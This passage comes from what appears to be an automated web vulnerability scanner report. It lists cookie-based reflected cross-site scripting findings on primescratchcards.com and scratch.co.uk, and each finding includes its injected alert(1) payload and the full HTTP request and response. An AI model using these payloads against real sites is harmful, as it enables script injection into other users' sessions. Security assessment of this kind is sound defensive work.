<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<input type=hidden name ="AR" value ="130137cb889--><script>alert(1)</script>7c8fb9ac580">
...[SNIP]...

3.143. http://primescratchcards.com/images/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3da0'%3balert(1)//5a270d6e34e was submitted in the ARC cookie. This input was echoed as e3da0';alert(1)//5a270d6e34e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137e3da0'%3balert(1)//5a270d6e34e; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=130137e3da0%27%3Balert%281%29%2F%2F5a270d6e34e; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<1281)
   {
    sb = "yes";
   }


   window.open('https://secure.neogames-tech.com/ScratchCards/lobby.aspx?csi=3&LNG=~ENG&CUR=GBP&AR=130137e3da0';alert(1)//5a270d6e34e&AFI=3&PAR=0&BD=primescratchcards.com&SDN=primescratchcards.com','game','width=' + y + ',height=' + x + ',top=0,left=0,scrollbars=' + sb + ', menubar=no, toolbar=no,location=no,directories=no,status=no
...[SNIP]...

3.144. http://primescratchcards.com/images/underage.asp [ARC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/underage.asp

Issue detail

The value of the ARC cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85468"%3balert(1)//e0168fa7962 was submitted in the ARC cookie. This input was echoed as 85468";alert(1)//e0168fa7962 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /images/underage.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=13013785468"%3balert(1)//e0168fa7962; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013785468%22%3Balert%281%29%2F%2Fe0168fa7962; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013785468";alert(1)//e0168fa7962' border='0' width='1' height='1'>
...[SNIP]...

3.145. http://scratch.co.uk/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36051"><script>alert(1)</script>f6746a21160 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24336051"><script>alert(1)</script>f6746a21160; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24336051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef6746a21160; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG', 'direct-173|193|214|24336051"><script>alert(1)</script>f6746a21160');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.146. http://scratch.co.uk/ [affiliate cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the affiliate cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 485c6"%3balert(1)//e22d61d7a59 was submitted in the affiliate cookie. This input was echoed as 485c6";alert(1)//e22d61d7a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243485c6"%3balert(1)//e22d61d7a59; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243485c6%22%3Balert%281%29%2F%2Fe22d61d7a59; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
xt/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG', 'direct-173|193|214|243485c6";alert(1)//e22d61d7a59');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               topprizes: '$1,000,000',

...[SNIP]...

3.147. http://scratch.co.uk/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce5d"><script>alert(1)</script>16e5937d22d was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=dce5d"><script>alert(1)</script>16e5937d22d; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=dce5d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E16e5937d22d; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('dce5d"><script>alert(1)</script>16e5937d22d', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.148. http://scratch.co.uk/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload 58c29><script>alert(1)</script>cfec32cd964 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29><script>alert(1)</script>cfec32cd964; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecfec32cd964; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:18 GMT; path=/
Content-Type: text/html
Content-Length: 11427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(1)//814391c744558c29><script>alert(1)</script>cfec32cd964', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.149. http://scratch.co.uk/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21696"%3balert(1)//58111e9164 was submitted in the currency cookie. This input was echoed as 21696";alert(1)//58111e9164 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=21696"%3balert(1)//58111e9164; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=21696%22%3Balert%281%29%2F%2F58111e9164; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('21696";alert(1)//58111e9164', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',

...[SNIP]...

3.150. http://scratch.co.uk/ [currency cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the currency cookie is copied into a JavaScript rest-of-line comment. The payload 161fb%0aalert(1)//2182f944140 was submitted in the currency cookie. This input was echoed as 161fb
alert(1)//2182f944140 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0aalert(1)//2182f944140; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0Aalert%281%29%2F%2F2182f944140; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:20 GMT; path=/
Content-Type: text/html
Content-Length: 11477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
e="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445161fb
alert(1)//2182f944140', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',

...[SNIP]...

3.151. http://scratch.co.uk/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74696"%3balert(1)//2bb8cf6f796 was submitted in the lang cookie. This input was echoed as 74696";alert(1)//2bb8cf6f796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG74696"%3balert(1)//2bb8cf6f796; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG74696%22%3Balert%281%29%2F%2F2bb8cf6f796; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG74696";alert(1)//2bb8cf6f796', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               top
...[SNIP]...

3.152. http://scratch.co.uk/ [lang cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2298d"><script>alert(1)</script>bfab089b01f was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2298d"><script>alert(1)</script>bfab089b01f; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: lang=ENG2298d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebfab089b01f; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG2298d"><script>alert(1)</script>bfab089b01f', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.153. http://scratch.co.uk/ [neogamesemail cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://scratch.co.uk
Path:	/

Issue detail

The value of the neogamesemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>d33344ce0f7 was submitted in the neogamesemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deletedaf05e"><script>alert(1)</script>d33344ce0f7; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: neogamesemail=deletedaf05e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed33344ce0f7%7E%7E; expires=Tue, 17-May-2011 00:27:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14257

